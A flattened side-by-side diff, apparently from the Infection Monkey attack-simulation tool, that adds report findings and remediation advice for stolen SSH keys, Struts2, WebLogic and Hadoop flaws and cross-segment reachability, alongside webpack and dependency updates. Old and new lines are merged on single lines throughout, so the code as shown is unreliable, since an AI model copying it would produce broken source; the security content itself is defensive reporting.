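To make the pairing explicit, a small illustrative expansion; the subnets are made up. Ordered pairs are produced, and identical pairs are discarded inside get_cross_segment_issues_per_subnet_pair:

import itertools

subnet_group = ['10.0.0.0/24', '10.0.1.0/24', '172.16.5.0/28']
pairs = [p for p in itertools.product(subnet_group, subnet_group) if p[0] != p[1]]
print(len(pairs))   # 6 ordered pairs for a group of 3 subnets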
@staticmethod
def get_cross_segment_issues():
scans = mongo.db.telemetry.find({'telem_type': 'scan'},
{'monkey_guid': 1, 'data.machine.ip_addr': 1, 'data.machine.services': 1})
cross_segment_issues = []
# For now the feature is limited to 1 group.
subnet_groups = [ConfigService.get_config_value(['basic_network', 'network_analysis', 'inaccessible_subnets'])]
for subnet_group in subnet_groups:
cross_segment_issues += ReportService.get_cross_segment_issues_per_subnet_group(scans, subnet_group)
return cross_segment_issues
@staticmethod @staticmethod
def get_issues(): def get_issues():
issues = ReportService.get_exploits() + ReportService.get_tunnels() + ReportService.get_cross_segment_issues() + ReportService.get_azure_issues() ISSUE_GENERATORS = [
ReportService.get_exploits,
ReportService.get_tunnels,
ReportService.get_island_cross_segment_issues,
ReportService.get_azure_issues
]
issues = functools.reduce(lambda acc, issue_gen: acc + issue_gen(), ISSUE_GENERATORS, [])
issues_dict = {} issues_dict = {}
for issue in issues: for issue in issues:
machine = issue['machine'] machine = issue['machine']
if machine not in issues_dict: if machine not in issues_dict:
issues_dict[machine] = [] issues_dict[machine] = []
issues_dict[machine].append(issue) issues_dict[machine].append(issue)
logger.info('Issues generated for reporting')
return issues_dict return issues_dict
@staticmethod @staticmethod
@ -371,8 +591,16 @@ class ReportService:
issues_byte_array[ReportService.ISSUES_DICT.CONFICKER.value] = True issues_byte_array[ReportService.ISSUES_DICT.CONFICKER.value] = True
elif issue['type'] == 'azure_password': elif issue['type'] == 'azure_password':
issues_byte_array[ReportService.ISSUES_DICT.AZURE.value] = True issues_byte_array[ReportService.ISSUES_DICT.AZURE.value] = True
elif issue['type'] == 'ssh_key':
issues_byte_array[ReportService.ISSUES_DICT.STOLEN_SSH_KEYS.value] = True
elif issue['type'] == 'struts2':
issues_byte_array[ReportService.ISSUES_DICT.STRUTS2.value] = True
elif issue['type'] == 'weblogic':
issues_byte_array[ReportService.ISSUES_DICT.WEBLOGIC.value] = True
elif issue['type'] == 'hadoop':
issues_byte_array[ReportService.ISSUES_DICT.HADOOP.value] = True
elif issue['type'].endswith('_password') and issue['password'] in config_passwords and \ elif issue['type'].endswith('_password') and issue['password'] in config_passwords and \
issue['username'] in config_users: issue['username'] in config_users or issue['type'] == 'ssh':
issues_byte_array[ReportService.ISSUES_DICT.WEAK_PASSWORD.value] = True issues_byte_array[ReportService.ISSUES_DICT.WEAK_PASSWORD.value] = True
elif issue['type'].endswith('_pth') or issue['type'].endswith('_password'): elif issue['type'].endswith('_pth') or issue['type'].endswith('_password'):
issues_byte_array[ReportService.ISSUES_DICT.STOLEN_CREDS.value] = True issues_byte_array[ReportService.ISSUES_DICT.STOLEN_CREDS.value] = True
@ -380,16 +608,19 @@ class ReportService:
return issues_byte_array return issues_byte_array
@staticmethod @staticmethod
def get_warnings_overview(issues): def get_warnings_overview(issues, cross_segment_issues):
warnings_byte_array = [False] * 2 warnings_byte_array = [False] * 2
for machine in issues: for machine in issues:
for issue in issues[machine]: for issue in issues[machine]:
if issue['type'] == 'cross_segment': if issue['type'] == 'island_cross_segment':
warnings_byte_array[ReportService.WARNINGS_DICT.CROSS_SEGMENT.value] = True warnings_byte_array[ReportService.WARNINGS_DICT.CROSS_SEGMENT.value] = True
elif issue['type'] == 'tunnel': elif issue['type'] == 'tunnel':
warnings_byte_array[ReportService.WARNINGS_DICT.TUNNEL.value] = True warnings_byte_array[ReportService.WARNINGS_DICT.TUNNEL.value] = True
if len(cross_segment_issues) != 0:
warnings_byte_array[ReportService.WARNINGS_DICT.CROSS_SEGMENT.value] = True
return warnings_byte_array return warnings_byte_array
@staticmethod @staticmethod
@ -405,12 +636,14 @@ class ReportService:
{'name': 'generated_report'}, {'name': 'generated_report'},
{'$set': {'value': True}}, {'$set': {'value': True}},
upsert=True) upsert=True)
logger.info("Report marked as generated.")
@staticmethod @staticmethod
def get_report(): def get_report():
issues = ReportService.get_issues() issues = ReportService.get_issues()
config_users = ReportService.get_config_users() config_users = ReportService.get_config_users()
config_passwords = ReportService.get_config_passwords() config_passwords = ReportService.get_config_passwords()
cross_segment_issues = ReportService.get_cross_segment_issues()
report = \ report = \
{ {
@ -425,7 +658,8 @@ class ReportService:
'monkey_start_time': ReportService.get_first_monkey_time().strftime("%d/%m/%Y %H:%M:%S"), 'monkey_start_time': ReportService.get_first_monkey_time().strftime("%d/%m/%Y %H:%M:%S"),
'monkey_duration': ReportService.get_monkey_duration(), 'monkey_duration': ReportService.get_monkey_duration(),
'issues': ReportService.get_issues_overview(issues, config_users, config_passwords), 'issues': ReportService.get_issues_overview(issues, config_users, config_passwords),
'warnings': ReportService.get_warnings_overview(issues) 'warnings': ReportService.get_warnings_overview(issues, cross_segment_issues),
'cross_segment_issues': cross_segment_issues
}, },
'glance': 'glance':
{ {
@ -433,6 +667,7 @@ class ReportService:
'exploited': ReportService.get_exploited(), 'exploited': ReportService.get_exploited(),
'stolen_creds': ReportService.get_stolen_creds(), 'stolen_creds': ReportService.get_stolen_creds(),
'azure_passwords': ReportService.get_azure_creds(), 'azure_passwords': ReportService.get_azure_creds(),
'ssh_keys': ReportService.get_ssh_keys()
}, },
'recommendations': 'recommendations':
{ {

View File

@ -1,7 +1,4 @@
{ {
"presets": [ "presets": ["es2015", "stage-0", "react"]
"es2015",
"stage-0",
"react"
]
} }

View File

@ -1,43 +0,0 @@
'use strict';
let path = require('path');
let defaultSettings = require('./defaults');
// Additional npm or bower modules to include in builds
// Add all foreign plugins you may need into this array
// @example:
// let npmBase = path.join(__dirname, '../node_modules');
// let additionalPaths = [ path.join(npmBase, 'react-bootstrap') ];
let additionalPaths = [];
module.exports = {
additionalPaths: additionalPaths,
port: defaultSettings.port,
debug: true,
devtool: 'eval',
output: {
path: path.join(__dirname, '/../dist/assets'),
filename: 'app.js',
publicPath: defaultSettings.publicPath
},
devServer: {
contentBase: './src/',
historyApiFallback: true,
hot: true,
port: defaultSettings.port,
publicPath: defaultSettings.publicPath,
noInfo: false
},
resolve: {
extensions: ['', '.js', '.jsx'],
alias: {
actions: `${defaultSettings.srcPath}/actions/`,
components: `${defaultSettings.srcPath}/components/`,
sources: `${defaultSettings.srcPath}/sources/`,
stores: `${defaultSettings.srcPath}/stores/`,
styles: `${defaultSettings.srcPath}/styles/`,
config: `${defaultSettings.srcPath}/config/` + process.env.REACT_WEBPACK_ENV,
'react/lib/ReactMount': 'react-dom/lib/ReactMount'
}
},
module: {}
};

View File

@ -1,68 +0,0 @@
/**
* Function that returns default values.
* Used because Object.assign does a shallow instead of a deep copy.
* Using [].push will add to the base array, so a require will alter
* the base array output.
*/
'use strict';
const path = require('path');
const srcPath = path.join(__dirname, '/../src');
const dfltPort = 8000;
/**
* Get the default modules object for webpack
* @return {Object}
*/
function getDefaultModules() {
return {
preLoaders: [
{
test: /\.(js|jsx)$/,
include: srcPath,
loader: 'eslint-loader'
}
],
loaders: [
{
test: /\.css$/,
loader: 'style-loader!css-loader'
},
{
test: /\.sass/,
loader: 'style-loader!css-loader!sass-loader?outputStyle=expanded&indentedSyntax'
},
{
test: /\.scss/,
loader: 'style-loader!css-loader!sass-loader?outputStyle=expanded'
},
{
test: /\.less/,
loader: 'style-loader!css-loader!less-loader'
},
{
test: /\.styl/,
loader: 'style-loader!css-loader!stylus-loader'
},
{
test: /\.(png|jpg|gif)$/,
loader: 'url-loader?limit=8192'
},
{
test: /\.woff(2)?(\?v=[0-9]\.[0-9]\.[0-9])?$/,
loader: 'url-loader?limit=10000&mimetype=application/font-woff'
},
{
test: /\.(ttf|eot|svg)(\?v=[0-9]\.[0-9]\.[0-9])?$/,
loader: 'file-loader'
}
]
};
}
module.exports = {
srcPath: srcPath,
publicPath: '/assets/',
port: dfltPort,
getDefaultModules: getDefaultModules
};

View File

@ -1,47 +0,0 @@
'use strict';
let path = require('path');
let webpack = require('webpack');
let baseConfig = require('./base');
let defaultSettings = require('./defaults');
// Add needed plugins here
let BowerWebpackPlugin = require('bower-webpack-plugin');
let config = Object.assign({}, baseConfig, {
entry: [
'webpack-dev-server/client?http://127.0.0.1:' + defaultSettings.port,
'webpack/hot/only-dev-server',
'./src/index'
],
cache: true,
devtool: 'eval-source-map',
plugins: [
new webpack.HotModuleReplacementPlugin(),
new webpack.NoErrorsPlugin(),
new BowerWebpackPlugin({
searchResolveModulesDirectories: false
})
],
module: defaultSettings.getDefaultModules()
});
// Add needed loaders to the defaults here
config.module.loaders.push({
test: /\.(js|jsx)$/,
loader: 'react-hot!babel-loader',
include: [].concat(
config.additionalPaths,
[ path.join(__dirname, '/../src') ]
)
});
// proxy to backend server
config.devServer.proxy = {
'/api': {
target: 'https://localhost:5000',
secure: false
}
};
module.exports = config;

View File

@ -1,42 +0,0 @@
'use strict';
let path = require('path');
let webpack = require('webpack');
let baseConfig = require('./base');
let defaultSettings = require('./defaults');
// Add needed plugins here
let BowerWebpackPlugin = require('bower-webpack-plugin');
let config = Object.assign({}, baseConfig, {
entry: path.join(__dirname, '../src/index'),
cache: false,
devtool: 'sourcemap',
plugins: [
new webpack.optimize.DedupePlugin(),
new webpack.DefinePlugin({
'process.env.NODE_ENV': '"production"'
}),
new BowerWebpackPlugin({
searchResolveModulesDirectories: false
}),
new webpack.optimize.UglifyJsPlugin(),
new webpack.optimize.OccurenceOrderPlugin(),
new webpack.optimize.AggressiveMergingPlugin(),
new webpack.NoErrorsPlugin()
],
module: defaultSettings.getDefaultModules()
});
// Add needed loaders to the defaults here
config.module.loaders.push({
test: /\.(js|jsx)$/,
loader: 'babel',
include: [].concat(
config.additionalPaths,
[ path.join(__dirname, '/../src') ]
)
});
module.exports = config;

View File

@ -1,51 +0,0 @@
'use strict';
let path = require('path');
let srcPath = path.join(__dirname, '/../src/');
let baseConfig = require('./base');
// Add needed plugins here
let BowerWebpackPlugin = require('bower-webpack-plugin');
module.exports = {
devtool: 'eval',
module: {
preLoaders: [
],
loaders: [
{
test: /\.(png|jpg|gif|woff|woff2|css|sass|scss|less|styl)$/,
loader: 'null-loader'
},
{
test: /\.(js|jsx)$/,
loader: 'babel-loader',
include: [].concat(
baseConfig.additionalPaths,
[
path.join(__dirname, '/../src'),
path.join(__dirname, '/../test')
]
)
}
]
},
resolve: {
extensions: [ '', '.js', '.jsx' ],
alias: {
actions: srcPath + 'actions/',
helpers: path.join(__dirname, '/../test/helpers'),
components: srcPath + 'components/',
sources: srcPath + 'sources/',
stores: srcPath + 'stores/',
styles: srcPath + 'styles/',
config: srcPath + 'config/' + process.env.REACT_WEBPACK_ENV
}
},
plugins: [
new BowerWebpackPlugin({
searchResolveModulesDirectories: false
})
]
};

File diff suppressed because it is too large Load Diff

View File

@ -2,11 +2,10 @@
"private": true, "private": true,
"version": "1.0.0", "version": "1.0.0",
"description": "Infection Monkey C&C UI", "description": "Infection Monkey C&C UI",
"main": "",
"scripts": { "scripts": {
"clean": "rimraf dist/*", "clean": "rimraf dist/*",
"copy": "copyfiles -f ./src/index.html ./src/favicon.ico ./dist", "copy": "copyfiles -f ./src/index.html ./src/favicon.ico ./dist",
"dist": "npm run copy & webpack --env=dist", "dist": "webpack --mode production",
"lint": "eslint ./src", "lint": "eslint ./src",
"posttest": "npm run lint", "posttest": "npm run lint",
"release:major": "npm version major && npm publish && git push --follow-tags", "release:major": "npm version major && npm publish && git push --follow-tags",
@ -14,7 +13,7 @@
"release:patch": "npm version patch && npm publish && git push --follow-tags", "release:patch": "npm version patch && npm publish && git push --follow-tags",
"serve": "node server.js --env=dev", "serve": "node server.js --env=dev",
"serve:dist": "node server.js --env=dist", "serve:dist": "node server.js --env=dist",
"start": "node server.js --env=dev", "start": "webpack-dev-server --mode development --open --history-api-fallback --port 8000",
"test": "karma start", "test": "karma start",
"test:watch": "karma start --autoWatch=true --singleRun=false" "test:watch": "karma start --autoWatch=true --singleRun=false"
}, },
@ -22,71 +21,75 @@
"keywords": [], "keywords": [],
"author": "Guardicore", "author": "Guardicore",
"devDependencies": { "devDependencies": {
"babel-core": "^6.26.0", "babel-cli": "^6.26.0",
"babel-eslint": "^6.0.0", "babel-core": "^6.26.3",
"babel-loader": "^6.4.1", "babel-eslint": "^8.2.6",
"babel-loader": "^7.1.5",
"babel-polyfill": "^6.26.0", "babel-polyfill": "^6.26.0",
"babel-preset-env": "^1.7.0",
"babel-preset-es2015": "^6.24.1", "babel-preset-es2015": "^6.24.1",
"babel-preset-react": "^6.24.1", "babel-preset-react": "^6.24.1",
"babel-preset-stage-0": "^6.5.0", "babel-preset-stage-0": "^6.5.0",
"bower-webpack-plugin": "^0.1.9", "bower-webpack-plugin": "^0.1.9",
"chai": "^3.2.0", "chai": "^4.1.2",
"copyfiles": "^1.0.0", "copyfiles": "^2.0.0",
"css-loader": "^0.23.1", "css-loader": "^1.0.0",
"eslint": "^3.0.0", "eslint": "^5.3.0",
"eslint-loader": "^1.0.0", "eslint-loader": "^2.1.0",
"eslint-plugin-react": "^6.0.0", "eslint-plugin-react": "^7.11.1",
"file-loader": "^0.9.0", "file-loader": "^1.1.11",
"glob": "^7.0.0", "glob": "^7.0.0",
"karma": "^1.7.1", "html-loader": "^0.5.5",
"html-webpack-plugin": "^3.2.0",
"karma": "^3.0.0",
"karma-chai": "^0.1.0", "karma-chai": "^0.1.0",
"karma-coverage": "^1.0.0", "karma-coverage": "^1.1.2",
"karma-mocha": "^1.0.0", "karma-mocha": "^1.0.0",
"karma-mocha-reporter": "^2.2.5", "karma-mocha-reporter": "^2.2.5",
"karma-phantomjs-launcher": "^1.0.0", "karma-phantomjs-launcher": "^1.0.0",
"karma-sourcemap-loader": "^0.3.5", "karma-sourcemap-loader": "^0.3.5",
"karma-webpack": "^1.7.0", "karma-webpack": "^3.0.0",
"minimist": "^1.2.0", "minimist": "^1.2.0",
"mocha": "^3.5.3", "mocha": "^5.2.0",
"null-loader": "^0.1.1", "null-loader": "^0.1.1",
"open": "0.0.5", "open": "0.0.5",
"phantomjs-prebuilt": "^2.1.16", "phantomjs-prebuilt": "^2.1.16",
"react-addons-test-utils": "^15.6.2", "react-addons-test-utils": "^15.6.2",
"react-hot-loader": "^1.2.9", "react-hot-loader": "^4.3.4",
"rimraf": "^2.6.2", "rimraf": "^2.6.2",
"style-loader": "^0.13.2", "style-loader": "^0.22.1",
"url-loader": "^0.5.9", "url-loader": "^1.1.0",
"webpack": "^1.15.0", "webpack": "^4.16.5",
"webpack-dev-server": "^1.12.0" "webpack-cli": "^3.1.0",
"webpack-dev-server": "^3.1.5"
}, },
"dependencies": { "dependencies": {
"bootstrap": "^3.3.7", "bootstrap": "3.3.7",
"core-js": "^2.5.5", "core-js": "^2.5.7",
"downloadjs": "^1.4.7", "downloadjs": "^1.4.7",
"fetch": "^1.1.0", "fetch": "^1.1.0",
"js-file-download": "^0.4.1", "js-file-download": "^0.4.1",
"json-loader": "^0.5.7", "json-loader": "^0.5.7",
"jwt-decode": "^2.2.0", "jwt-decode": "^2.2.0",
"moment": "^2.22.1", "moment": "^2.22.2",
"normalize.css": "^4.0.0", "normalize.css": "^8.0.0",
"npm": "^5.8.0", "npm": "^6.3.0",
"prop-types": "^15.6.1", "prop-types": "^15.6.2",
"rc-progress": "^2.2.5", "rc-progress": "^2.2.5",
"react": "^15.6.2", "react": "^16.4.2",
"react-bootstrap": "^0.31.5", "react-bootstrap": "^0.32.1",
"react-copy-to-clipboard": "^5.0.1", "react-copy-to-clipboard": "^5.0.1",
"react-data-components": "^1.2.0", "react-data-components": "^1.2.0",
"react-dimensions": "^1.3.0", "react-dimensions": "^1.3.0",
"react-dom": "^15.6.2", "react-dom": "^16.4.2",
"react-fa": "^4.2.0", "react-fa": "^5.0.0",
"react-graph-vis": "^0.1.4", "react-graph-vis": "^1.0.2",
"react-json-tree": "^0.10.9", "react-json-tree": "^0.11.0",
"react-jsonschema-form": "^0.50.1", "react-jsonschema-form": "^1.0.4",
"react-modal-dialog": "^4.0.7",
"react-redux": "^5.0.7", "react-redux": "^5.0.7",
"react-router-dom": "^4.2.2", "react-router-dom": "^4.3.1",
"react-table": "^6.7.4", "react-table": "^6.8.6",
"react-toggle": "^4.0.1", "react-toggle": "^4.0.1",
"redux": "^3.7.2" "redux": "^4.0.0"
} }
} }

View File

@ -14,11 +14,11 @@ import LicensePage from 'components/pages/LicensePage';
import AuthComponent from 'components/AuthComponent'; import AuthComponent from 'components/AuthComponent';
import LoginPageComponent from 'components/pages/LoginPage'; import LoginPageComponent from 'components/pages/LoginPage';
require('normalize.css/normalize.css'); import 'normalize.css/normalize.css';
require('react-data-components/css/table-twbs.css'); import 'react-data-components/css/table-twbs.css';
require('styles/App.css'); import 'styles/App.css';
require('react-toggle/style.css'); import 'react-toggle/style.css';
require('react-table/react-table.css'); import 'react-table/react-table.css';
let logoImage = require('../images/monkey-icon.svg'); let logoImage = require('../images/monkey-icon.svg');
let infectionMonkeyImage = require('../images/infection-monkey.svg'); let infectionMonkeyImage = require('../images/infection-monkey.svg');

View File

@ -13,6 +13,7 @@ let getGroupsOptions = () => {
image: require('../../images/nodes/' + groupName + '.png') image: require('../../images/nodes/' + groupName + '.png')
}; };
} }
return groupOptions; return groupOptions;
}; };

View File

@ -155,6 +155,14 @@ class PreviewPaneComponent extends AuthComponent {
) )
} }
islandAssetInfo() {
return (
<div>
No info to show
</div>
);
}
assetInfo(asset) { assetInfo(asset) {
return ( return (
<div> <div>
@ -244,8 +252,8 @@ class PreviewPaneComponent extends AuthComponent {
info = this.scanInfo(this.props.item); info = this.scanInfo(this.props.item);
break; break;
case 'node': case 'node':
info = this.props.item.group.includes('monkey', 'manual') ? info = this.props.item.group.includes('monkey', 'manual') ? this.infectedAssetInfo(this.props.item) :
this.infectedAssetInfo(this.props.item) : this.assetInfo(this.props.item); this.props.item.group !== 'island' ? this.assetInfo(this.props.item) : this.islandAssetInfo();
break; break;
case 'island_edge': case 'island_edge':
info = this.islandEdgeInfo(); info = this.islandEdgeInfo();

View File

@ -1,10 +1,9 @@
import React from 'react'; import React from 'react';
import {Col} from 'react-bootstrap'; import {Col, Modal} from 'react-bootstrap';
import {Link} from 'react-router-dom'; import {Link} from 'react-router-dom';
import {Icon} from 'react-fa'; import {Icon} from 'react-fa';
import PreviewPane from 'components/map/preview-pane/PreviewPane'; import PreviewPane from 'components/map/preview-pane/PreviewPane';
import {ReactiveGraph} from 'components/reactive-graph/ReactiveGraph'; import {ReactiveGraph} from 'components/reactive-graph/ReactiveGraph';
import {ModalContainer, ModalDialog} from 'react-modal-dialog';
import {options, edgeGroupToColor} from 'components/map/MapOptions'; import {options, edgeGroupToColor} from 'components/map/MapOptions';
import AuthComponent from '../AuthComponent'; import AuthComponent from '../AuthComponent';
@ -45,7 +44,7 @@ class MapPageComponent extends AuthComponent {
.then(res => res.json()) .then(res => res.json())
.then(res => { .then(res => {
res.edges.forEach(edge => { res.edges.forEach(edge => {
edge.color = edgeGroupToColor(edge.group); edge.color = {'color': edgeGroupToColor(edge.group)};
}); });
this.setState({graph: res}); this.setState({graph: res});
this.props.onStatusChange(); this.props.onStatusChange();
@ -98,14 +97,10 @@ class MapPageComponent extends AuthComponent {
}; };
renderKillDialogModal = () => { renderKillDialogModal = () => {
if (!this.state.showKillDialog) {
return <div />
}
return ( return (
<ModalContainer onClose={() => this.setState({showKillDialog: false})}> <Modal show={this.state.showKillDialog} onHide={() => this.setState({showKillDialog: false})}>
<ModalDialog onClose={() => this.setState({showKillDialog: false})}> <Modal.Body>
<h2>Are you sure you want to kill all monkeys?</h2> <h2><div className="text-center">Are you sure you want to kill all monkeys?</div></h2>
<p style={{'fontSize': '1.2em', 'marginBottom': '2em'}}> <p style={{'fontSize': '1.2em', 'marginBottom': '2em'}}>
This might take a few moments... This might take a few moments...
</p> </p>
@ -122,9 +117,10 @@ class MapPageComponent extends AuthComponent {
Cancel Cancel
</button> </button>
</div> </div>
</ModalDialog> </Modal.Body>
</ModalContainer> </Modal>
) )
}; };
renderTelemetryEntry(telemetry) { renderTelemetryEntry(telemetry) {

View File

@ -22,7 +22,11 @@ class ReportPageComponent extends AuthComponent {
SAMBACRY: 3, SAMBACRY: 3,
SHELLSHOCK: 4, SHELLSHOCK: 4,
CONFICKER: 5, CONFICKER: 5,
AZURE: 6 AZURE: 6,
STOLEN_SSH_KEYS: 7,
STRUTS2: 8,
WEBLOGIC: 9,
HADOOP: 10
}; };
Warning = Warning =
@ -293,6 +297,8 @@ class ReportPageComponent extends AuthComponent {
return x === true; return x === true;
}).length} threats</span>: }).length} threats</span>:
<ul> <ul>
{this.state.report.overview.issues[this.Issue.STOLEN_SSH_KEYS] ?
<li>Stolen SSH keys are used to exploit other machines.</li> : null }
{this.state.report.overview.issues[this.Issue.STOLEN_CREDS] ? {this.state.report.overview.issues[this.Issue.STOLEN_CREDS] ?
<li>Stolen credentials are used to exploit other machines.</li> : null} <li>Stolen credentials are used to exploit other machines.</li> : null}
{this.state.report.overview.issues[this.Issue.ELASTIC] ? {this.state.report.overview.issues[this.Issue.ELASTIC] ?
@ -318,7 +324,16 @@ class ReportPageComponent extends AuthComponent {
<li>Azure machines expose plaintext passwords. (<a <li>Azure machines expose plaintext passwords. (<a
href="https://www.guardicore.com/2018/03/recovering-plaintext-passwords-azure/" href="https://www.guardicore.com/2018/03/recovering-plaintext-passwords-azure/"
>More info</a>)</li> : null} >More info</a>)</li> : null}
{this.state.report.overview.issues[this.Issue.STRUTS2] ?
<li>Struts2 servers are vulnerable to remote code execution. (<a
href="https://cwiki.apache.org/confluence/display/WW/S2-045">
CVE-2017-5638</a>)</li> : null }
{this.state.report.overview.issues[this.Issue.WEBLOGIC] ?
<li>Oracle WebLogic servers are vulnerable to remote code execution. (<a
href="https://nvd.nist.gov/vuln/detail/CVE-2017-10271">
CVE-2017-10271</a>)</li> : null }
{this.state.report.overview.issues[this.Issue.HADOOP] ?
<li>Hadoop/Yarn servers are vulnerable to remote code execution.</li> : null }
</ul> </ul>
</div> </div>
: :
@ -343,7 +358,7 @@ class ReportPageComponent extends AuthComponent {
<li>Weak segmentation - Machines from different segments are able to <li>Weak segmentation - Machines from different segments are able to
communicate.</li> : null} communicate.</li> : null}
{this.state.report.overview.warnings[this.Warning.TUNNEL] ? {this.state.report.overview.warnings[this.Warning.TUNNEL] ?
<li>Weak segmentation - machines were able to communicate over unused ports.</li> : null} <li>Weak segmentation - Machines were able to communicate over unused ports.</li> : null}
</ul> </ul>
</div> </div>
: :
@ -352,6 +367,21 @@ class ReportPageComponent extends AuthComponent {
</div> </div>
} }
</div> </div>
{ this.state.report.overview.cross_segment_issues.length > 0 ?
<div>
<h3>
Segmentation Issues
</h3>
<div>
The Monkey uncovered the following set of segmentation issues:
<ul>
{this.state.report.overview.cross_segment_issues.map(x => this.generateCrossSegmentIssue(x))}
</ul>
</div>
</div>
:
''
}
</div> </div>
); );
} }
@ -414,7 +444,7 @@ class ReportPageComponent extends AuthComponent {
<ScannedServers data={this.state.report.glance.scanned}/> <ScannedServers data={this.state.report.glance.scanned}/>
</div> </div>
<div> <div>
<StolenPasswords data={this.state.report.glance.stolen_creds}/> <StolenPasswords data={this.state.report.glance.stolen_creds.concat(this.state.report.glance.ssh_keys)}/>
</div> </div>
</div> </div>
); );
@ -435,6 +465,27 @@ class ReportPageComponent extends AuthComponent {
return data_array.map(badge_data => <span className="label label-info" style={{margin: '2px'}}>{badge_data}</span>); return data_array.map(badge_data => <span className="label label-info" style={{margin: '2px'}}>{badge_data}</span>);
} }
generateCrossSegmentIssue(crossSegmentIssue) {
return <li>
{'Communication possible from ' + crossSegmentIssue['source_subnet'] + ' to ' + crossSegmentIssue['target_subnet']}
<CollapsibleWellComponent>
<ul>
{crossSegmentIssue['issues'].map(x =>
x['is_self'] ?
<li>
{'Machine ' + x['hostname'] + ' has both IPs: ' + x['source'] + ' and ' + x['target']}
</li>
:
<li>
{'IP ' + x['source'] + ' (' + x['hostname'] + ') connected to IP ' + x['target']
+ ' using the services: ' + Object.keys(x['services']).join(', ')}
</li>
)}
</ul>
</CollapsibleWellComponent>
</li>;
}
generateShellshockPathListBadges(paths) { generateShellshockPathListBadges(paths) {
return paths.map(path => <span className="label label-warning" style={{margin: '2px'}}>{path}</span>); return paths.map(path => <span className="label label-warning" style={{margin: '2px'}}>{path}</span>);
} }
@ -524,6 +575,22 @@ class ReportPageComponent extends AuthComponent {
); );
} }
generateSshKeysIssue(issue) {
return (
<li>
Protect <span className="label label-success">{issue.ssh_key}</span> private key with a pass phrase.
<CollapsibleWellComponent>
The machine <span className="label label-primary">{issue.machine}</span> (<span
className="label label-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to a <span
className="label label-danger">SSH</span> attack.
<br/>
The Monkey authenticated over the SSH protocol with private key <span
className="label label-success">{issue.ssh_key}</span>.
</CollapsibleWellComponent>
</li>
);
}
generateRdpIssue(issue) { generateRdpIssue(issue) {
return ( return (
<li> <li>
@ -624,7 +691,7 @@ class ReportPageComponent extends AuthComponent {
); );
} }
generateCrossSegmentIssue(issue) { generateIslandCrossSegmentIssue(issue) {
return ( return (
<li> <li>
Segment your network and make sure there is no communication between machines from different segments. Segment your network and make sure there is no communication between machines from different segments.
@ -652,6 +719,58 @@ class ReportPageComponent extends AuthComponent {
); );
} }
generateStruts2Issue(issue) {
return (
<li>
Upgrade Struts2 to version 2.3.32, 2.5.10.1, or any later version.
<CollapsibleWellComponent>
Struts2 server at <span className="label label-primary">{issue.machine}</span> (<span
className="label label-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to <span
className="label label-danger">remote code execution</span> attack.
<br/>
The attack was made possible because the server is using an old version of the Jakarta-based file upload
Multipart parser. For possible workarounds and more info, read <a
href="https://cwiki.apache.org/confluence/display/WW/S2-045"
>here</a>.
</CollapsibleWellComponent>
</li>
);
}
generateWebLogicIssue(issue) {
return (
<li>
Install Oracle <a href="http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html">
critical patch updates</a> or upgrade the server version. Vulnerable versions are
10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.
<CollapsibleWellComponent>
Oracle WebLogic server at <span className="label label-primary">{issue.machine}</span> (<span
className="label label-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to <span
className="label label-danger">remote code execution</span> attack.
<br/>
The attack was made possible due to incorrect permission assignment in Oracle Fusion Middleware
(subcomponent: WLS Security).
</CollapsibleWellComponent>
</li>
);
}
generateHadoopIssue(issue) {
return (
<li>
Run Hadoop in secure mode (<a href="http://hadoop.apache.org/docs/current/hadoop-project-dist/hadoop-common/SecureMode.html">
add Kerberos authentication</a>).
<CollapsibleWellComponent>
Hadoop/Yarn server at <span className="label label-primary">{issue.machine}</span> (<span
className="label label-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to <span
className="label label-danger">remote code execution</span> attack.
<br/>
The attack was made possible due to default Hadoop/Yarn configuration being insecure.
</CollapsibleWellComponent>
</li>
);
}
generateIssue = (issue) => { generateIssue = (issue) => {
@ -672,6 +791,9 @@ class ReportPageComponent extends AuthComponent {
case 'ssh': case 'ssh':
data = this.generateSshIssue(issue); data = this.generateSshIssue(issue);
break; break;
case 'ssh_key':
data = this.generateSshKeysIssue(issue);
break;
case 'rdp': case 'rdp':
data = this.generateRdpIssue(issue); data = this.generateRdpIssue(issue);
break; break;
@ -687,7 +809,7 @@ class ReportPageComponent extends AuthComponent {
case 'conficker': case 'conficker':
data = this.generateConfickerIssue(issue); data = this.generateConfickerIssue(issue);
break; break;
case 'cross_segment': case 'island_cross_segment':
data = this.generateCrossSegmentIssue(issue); data = this.generateIslandCrossSegmentIssue(issue);
break; break;
case 'tunnel': case 'tunnel':
@ -696,6 +818,15 @@ class ReportPageComponent extends AuthComponent {
case 'azure_password': case 'azure_password':
data = this.generateAzureIssue(issue); data = this.generateAzureIssue(issue);
break; break;
case 'struts2':
data = this.generateStruts2Issue(issue);
break;
case 'weblogic':
data = this.generateWebLogicIssue(issue);
break;
case 'hadoop':
data = this.generateHadoopIssue(issue);
break;
} }
return data; return data;
}; };

View File

@ -1,7 +1,6 @@
import React from 'react'; import React from 'react';
import {Col} from 'react-bootstrap'; import {Col, Modal} from 'react-bootstrap';
import {Link} from 'react-router-dom'; import {Link} from 'react-router-dom';
import {ModalContainer, ModalDialog} from 'react-modal-dialog';
import AuthComponent from '../AuthComponent'; import AuthComponent from '../AuthComponent';
class StartOverPageComponent extends AuthComponent { class StartOverPageComponent extends AuthComponent {
@ -27,14 +26,10 @@ class StartOverPageComponent extends AuthComponent {
}; };
renderCleanDialogModal = () => { renderCleanDialogModal = () => {
if (!this.state.showCleanDialog) {
return <div />
}
return ( return (
<ModalContainer onClose={() => this.setState({showCleanDialog: false})}> <Modal show={this.state.showCleanDialog} onHide={() => this.setState({showCleanDialog: false})}>
<ModalDialog onClose={() => this.setState({showCleanDialog: false})}> <Modal.Body>
<h2>Reset environment</h2> <h2><div className="text-center">Reset environment</div></h2>
<p style={{'fontSize': '1.2em', 'marginBottom': '2em'}}> <p style={{'fontSize': '1.2em', 'marginBottom': '2em'}}>
Are you sure you want to reset the environment? Are you sure you want to reset the environment?
</p> </p>
@ -60,9 +55,10 @@ class StartOverPageComponent extends AuthComponent {
Cancel Cancel
</button> </button>
</div> </div>
</ModalDialog> </Modal.Body>
</ModalContainer> </Modal>
) )
}; };
render() { render() {

View File

@ -1,8 +1,9 @@
import React from 'react'; import React from 'react';
